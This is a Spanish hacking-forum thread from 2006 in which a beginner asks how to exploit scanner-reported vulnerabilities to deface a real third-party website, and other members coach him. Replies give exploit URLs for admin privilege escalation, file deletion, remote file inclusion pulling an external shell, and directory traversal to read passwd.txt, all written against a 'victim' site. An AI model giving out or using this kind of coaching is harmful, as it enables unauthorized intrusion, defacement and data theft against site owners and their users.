Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Noviembre 19, 2008, 04:07:52
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Deface con SSS (no exploit,) 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Deface con SSS (no exploit,)  (Leído 819 veces)
korger
Habitual
*****
Desconectado Desconectado

Mensajes: 160


No sabes algo,Aprende - Si lo sabes,hazlo tu mismo


Ver Perfil
« en: Octubre 07, 2006, 10:13:47 »
Buenas, me esta picando la curiosidad con esto de los defaces (Muchas gracias a Ozx por su manual) Grin
Bueno, pues el caso, es que ehe escaneado una web muy... vulnerable, una de las vulnerabilidades es esta,

Squirrelmail Multiple Remote Vulnerabilities

En la seccionde exploit, donde se supone que tendrian que estar para descargarlos,(como he visto en otros post,que deicne que les pasa lo mismo), en lugar de explois, sale una URL,

un ejemplo de esas multiples vulnerabilidades (que creo k es para obtener privilegios, corregidme si me equivoco por favor)

Privilege escalation

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion"root"&adm_Group1=// Find it from file:plugins/administrator/admins//&off=true&key=$

el caso es que no se que hacer, he leido como compilar exploits, pero como supongo esto no es un exploit, es una simple URL (que hay que interpretar correctamente)


Pues eso, que me gustaria, que me dijese, como usar esta "vulnerabilidad" , suponiendo que la web fuese
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.victima.com
 he leido algo de usar shells, pero no se nada sobre el tema.
GRACIAS
« Última modificación: Octubre 07, 2006, 05:04:35 por korger » En línea
NorK
SI NO AI SITIO PARA LA DERROTA LO MEJOR ES ENTRENAR.
Moderación
Habitual
*****
Desconectado Desconectado

Mensajes: 273

Respeto al sabio por sabiduria o por torpeza.


Ver Perfil
« Respuesta #1 en: Octubre 07, 2006, 01:10:55 »
Yo tambien soy nuevo en esto pero me parece que esa vulnerabilidad se aprovecha rooteando el servidor y si no me ekivoco... mediante rfi, como e dicho soy nuevo en esto y intento ayudar en lo que puedo.
Bye!
En línea


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
korger
Habitual
*****
Desconectado Desconectado

Mensajes: 160


No sabes algo,Aprende - Si lo sabes,hazlo tu mismo


Ver Perfil
« Respuesta #2 en: Octubre 07, 2006, 04:05:32 »
ok, gracias Nork, haver si algun "experimentado" Grin nos ayuda, y nos dice como explotar esta vulnerabilidad

Otra cosa, lo que está en rojo, es un comentario, o es parte de la URL?

PD: como se editaria una web explotando una vulnerabilidad (ganando privilegio de administrador, ), desde el mismo explorador, o desde un programa de edicion web (si esk se puede)

NOS VEMOS;D
« Última modificación: Octubre 07, 2006, 05:07:15 por korger » En línea
zickox
Visitante
« Respuesta #3 en: Octubre 07, 2006, 05:39:16 »
intentaste esto no?


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion"root"&adm_Group1=// Find it from file:plugins/administrator/admins//&off=true&key=$

salu2  Tongue
En línea
arquimedes
Visitante
« Respuesta #4 en: Octubre 08, 2006, 01:59:55 »
primero te tienes que meter mediante la url en esta carpeta de la web victima:
Código:
http://www.TUVICTIMA.com/plugins/administrator/admins/
y apuntar que te sale(Te saldra el grupo al que pertence el admin.

Luego despues de eso haces:
Código:
http://www.TUVICTIMA.com/plugins/administrator/options.php?username="root"&adm_Group1=(aqui lo que te a salido antes)&off=true&key=$

Esto deberia funcionar
En línea
korger
Habitual
*****
Desconectado Desconectado

Mensajes: 160


No sabes algo,Aprende - Si lo sabes,hazlo tu mismo


Ver Perfil
« Respuesta #5 en: Octubre 08, 2006, 04:57:05 »
Citar

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

He pesto eso, (con la web de la victima obviamente)Grin pero se inicia de manera normal, otra cosa, que creo que deberia haber dicho es que no es .com si no .tk, puede que influya?

Bueno, gracias, ahora mas o menos se como se usan estos "exploits URL" Grin,

PD: si en la url pusiese Shell habria que poner la direccion de una shell de verdad no?
GRACIAS
En línea
arquimedes
Visitante
« Respuesta #6 en: Octubre 08, 2006, 05:23:31 »
Código:
http://www.TUVICTIMA.com/plugins/administrator/admins/
Con esta url deverias de obtener el grupo al que perntenece el admin, que muy probablemente sea admin el nombre.

Citar
PD: si en la url pusiese Shell habria que poner la direccion de una shell de verdad no?
Si, la que yo utilizo es
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
En línea
korger
Habitual
*****
Desconectado Desconectado

Mensajes: 160


No sabes algo,Aprende - Si lo sabes,hazlo tu mismo


Ver Perfil
« Respuesta #7 en: Octubre 08, 2006, 07:52:04 »
ok, arquimedes, pero yo lo pruebo, esxactamentre ese code, cambiando TUVICTIMA por la web, y esta se inicia de manera totalmente normal, de que forma apareceria la informacion? en un texto en la web...?

Otra cosa, que repito, es que es .TK no .COM influye esto en algo?
En línea
NorK
SI NO AI SITIO PARA LA DERROTA LO MEJOR ES ENTRENAR.
Moderación
Habitual
*****
Desconectado Desconectado

Mensajes: 273

Respeto al sabio por sabiduria o por torpeza.


Ver Perfil
« Respuesta #8 en: Octubre 08, 2006, 08:03:54 »
Vale ahora llegamos donde postee yo tmb xDD arquimedes tiene que estar cansao de repetirlo xP
Ami con esta vln tambien me pasa lo mismo que a ti...
Y da = que sea .com, .es, .tk, .org loquesea ya que al pasar el escaner te detecta la vln y da = que dominio tenga.
Bye!
En línea


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
arquimedes
Visitante
« Respuesta #9 en: Octubre 08, 2006, 12:36:42 »
NorK no se exactamente que tipo de bug te a salido pero por el post que pusistes:
Citar
Privilege escalation

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion"root"&adm_Group1=// Find it from file:plugins/administrator/admins//&off=true&key=$
El bug es el quedaria:
Código:
http://www.example.com/plugins/administrator/options.php?username="root"&adm_Group1=[color=red]admin[/color]&off=true&key=$
La parte que te e puesto en rojo es el grupo al que pertenece el administrador, que muy probablemente sea tambien admin, pero el bug te dice que para estar seguro te metas en la carpeta /plugins/administrator/admins y lo verifiques ay.
Si me dices q no te sale nada yo que tu iria poco a poco:www.victima.com/plugins=>que no te sale nada=>google.com->search=site:www.victima.com
y busca hay alguna carpeta sospechosa
En línea
korger
Habitual
*****
Desconectado Desconectado

Mensajes: 160


No sabes algo,Aprende - Si lo sabes,hazlo tu mismo


Ver Perfil
« Respuesta #10 en: Octubre 08, 2006, 03:25:18 »
ok, ok, lo segundo es una recomendacion, para pillar el grupo, ok
creo que ya lo pillo

Ahora otra duda que os va a parecer absurda:
exactamente ese bug para que serviria? Grin Para ser admi?
(supongo que podrias controlar la pagnaa tu antojo no?, si es asi como, desde un programa de edicion web o k?)

Perdonad, pero esque de webs y demas soy un completo principiante

GRACIAS Grin
En línea
NorK
SI NO AI SITIO PARA LA DERROTA LO MEJOR ES ENTRENAR.
Moderación
Habitual
*****
Desconectado Desconectado

Mensajes: 273

Respeto al sabio por sabiduria o por torpeza.


Ver Perfil
« Respuesta #11 en: Octubre 09, 2006, 12:40:49 »
Cita de: arquimedes en Octubre 08, 2006, 12:36:42
NorK no se exactamente que tipo de bug te a salido pero por el post que pusistes:
Citar
Privilege escalation

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion"root"&adm_Group1=// Find it from file:plugins/administrator/admins//&off=true&key=$
El bug es el quedaria:
Código:
http://www.example.com/plugins/administrator/options.php?username="root"&adm_Group1=[color=red]admin[/color]&off=true&key=$
La parte que te e puesto en rojo es el grupo al que pertenece el administrador, que muy probablemente sea tambien admin, pero el bug te dice que para estar seguro te metas en la carpeta /plugins/administrator/admins y lo verifiques ay.
Si me dices q no te sale nada yo que tu iria poco a poco:www.victima.com/plugins=>que no te sale nada=>google.com->search=site:www.victima.com
y busca hay alguna carpeta sospechosa

Ok gracias arquimedes, pero me gustaria hablar con tigo por otro medio tipo msn si no es mucho pedir (sino te importa mandame un msn privado)
En línea


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
korger
Habitual
*****
Desconectado Desconectado

Mensajes: 160


No sabes algo,Aprende - Si lo sabes,hazlo tu mismo


Ver Perfil
« Respuesta #12 en: Octubre 09, 2006, 06:08:33 »
otra cosa, tengo este otro bug

File deletion:

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion[filehere]&message=1

Lo que esta en rojo, se supone que tengo que poner la ruta de un archivo, para borrarlo, hasta ahí ok, pero como hayo la ruta el archivo, se refiere, por ej, a la URL de una imagen??? o a que, esque no se como funcionan las rutas de los archivos en las webs

GRACIAS
« Última modificación: Octubre 09, 2006, 06:14:20 por korger » En línea
arquimedes
Visitante
« Respuesta #13 en: Octubre 09, 2006, 07:50:05 »
Citar
esque no se como funcionan las rutas de los archivos en las webs
Funcionan igual que en un pc normal.

Citar
como hayo la ruta el archivo, se refiere, por ej, a la URL de una imagen???

No. se refiere que puedes borrar archivos que se encuentren dentro de la carpeta de correo, osease los emails de la web.Aunque no estoy 100% seguro.
En línea
korger
Habitual
*****
Desconectado Desconectado

Mensajes: 160


No sabes algo,Aprende - Si lo sabes,hazlo tu mismo


Ver Perfil
« Respuesta #14 en: Octubre 09, 2006, 08:57:04 »
Pero, como hayo la ruta de los archivos???
entonces no se pueden eliminar archivos de la web, imagenes,, textos...
Eso seria siendo administrador no ?

NOS VEMOS;D
En línea
arquimedes
Visitante
« Respuesta #15 en: Octubre 09, 2006, 09:14:04 »
el la parte de [filehere] no tienes que poner ninguna ruta solo el nombre del archivo ya que estas en la carpeta de los mensajes.
Respecto a si puedes eliminar otros archivos de la web yo CREO que no porque el script que borra los mensajes no creo que permita borrar otras carpetas...
En línea
korger
Habitual
*****
Desconectado Desconectado

Mensajes: 160


No sabes algo,Aprende - Si lo sabes,hazlo tu mismo


Ver Perfil
« Respuesta #16 en: Octubre 09, 2006, 03:13:37 »
ok, esque este bug es para mails, de ahí que se llame SQUIERREL MAIL... Grin
creo k ya lo pillo, depende del tipo de bug, se pueden hacer unas u otras cosas, por ej, un bug en el ftp, te podria dar el control de este.. no??
Y por ej, k tipo de bug tendria k ser para controlar totalmente la web, como en esrte caso


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

o para cambiar el index...

GRACIAS
« Última modificación: Octubre 09, 2006, 03:49:40 por korger » En línea
arquimedes
Visitante
« Respuesta #17 en: Octubre 10, 2006, 07:23:41 »
Citar
Y por ej, k tipo de bug tendria k ser para controlar totalmente la web
normalmente si obtienes el hash de el admin o el pass, obtienes el control total de la web pero tambien puedes tener el control total con bug del tipo:
Código:
www.victima.com/scriptvulnerable=http://shell.txt?
De este modo obtienes el control de la web(aunque no siempre es asi)
En línea
korger
Habitual
*****
Desconectado Desconectado

Mensajes: 160


No sabes algo,Aprende - Si lo sabes,hazlo tu mismo


Ver Perfil
« Respuesta #18 en: Octubre 10, 2006, 09:16:50 »
ok, entonces si que es asi no ? depende del bug, depende lo que puedas hacer
Otra cosa, tengo una web con multiples fallos de este tipo (de anaconda)

Web Servers : Apache Cygwin Directory Traversal Vulnerability

Eso de Apache, que es, un server o algo Huh esque me a pasado en varias webs y me gustaria saber que es
Basicamente, lo que pasa es que encuentro muchos bugs, pero no entiendo biuen para que sirven,(no es por el ingles, lo entiendo) pero no se para que sirven


GRACIAS
« Última modificación: Octubre 10, 2006, 09:37:24 por korger » En línea
arquimedes
Visitante
« Respuesta #19 en: Octubre 10, 2006, 09:54:34 »

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Apache
es un tipo de servidor, como lo es el IIS de microsoft, la diferencia es que una es libre y el otro no.
Directory transversal es un tipo de bug en el que, desde el script vulnerable puedes acceder a otras carpetas.
ejem:
Código:
www.victima.com/admin/scriptvulnerable.php?=../admin/passwd.txt

el ../ seria el directory transversal.
P.D. el directory transversal no tiene por que ser obligatoriamente introducido en la url, tambien se puede introducir en algun campo que tenga la pagina, como puede ser un asunto de un mensaje o el mensaje en si
« Última modificación: Octubre 10, 2006, 09:57:46 por arquimedes » En línea
korger
Habitual
*****
Desconectado Desconectado

Mensajes: 160


No sabes algo,Aprende - Si lo sabes,hazlo tu mismo


Ver Perfil
« Respuesta #20 en: Octubre 10, 2006, 12:48:24 »
Ok, he aqui lo k no me queda claro, Grin
Como puedo hayar esas rutas de carpetas, por ej a veces en el bug me pone k para explotarlo /../../passwd.txt por ej, en teoria los ../ tienen que ser una ruta no, pero como se yo las rutas de esa web, las carpetas...
En línea
arquimedes
Visitante
« Respuesta #21 en: Octubre 10, 2006, 01:20:14 »
../ninguna carpeta.Creo q estas algo confundido.
Cuando te pone que vayas a la carpeta ../../passwd.txt lo unico que tienes q hacer es poner
Código:
www.victima.com/bug.php?=../../passwd.txt
lo que yo creo q tu pensabas era que habia q poner:
Código:
www.victima.com/bug.php?=carpeta1/carpeta2/passwd.txt
<-ASI NO

Espero haberte aclarado las ideas  Cheesy Cheesy
En línea
korger
Habitual
*****
Desconectado Desconectado

Mensajes: 160


No sabes algo,Aprende - Si lo sabes,hazlo tu mismo


Ver Perfil
« Respuesta #22 en: Octubre 10, 2006, 01:28:57 »
En línea
arquimedes
Visitante
« Respuesta #23 en: Octubre 10, 2006, 01:59:50 »
Citar
como veo que controlas mas o menos el tema
no creas q se muxo, tampoco llevo muxo tiempo en esto pero si quieres te puedeo echar una mano
En línea
korger
Habitual
*****
Desconectado Desconectado

Mensajes: 160


No sabes algo,Aprende - Si lo sabes,hazlo tu mismo


Ver Perfil
« Respuesta #24 en: Octubre 11, 2006, 02:35:13 »
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Deface con SSS (no exploit,) « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC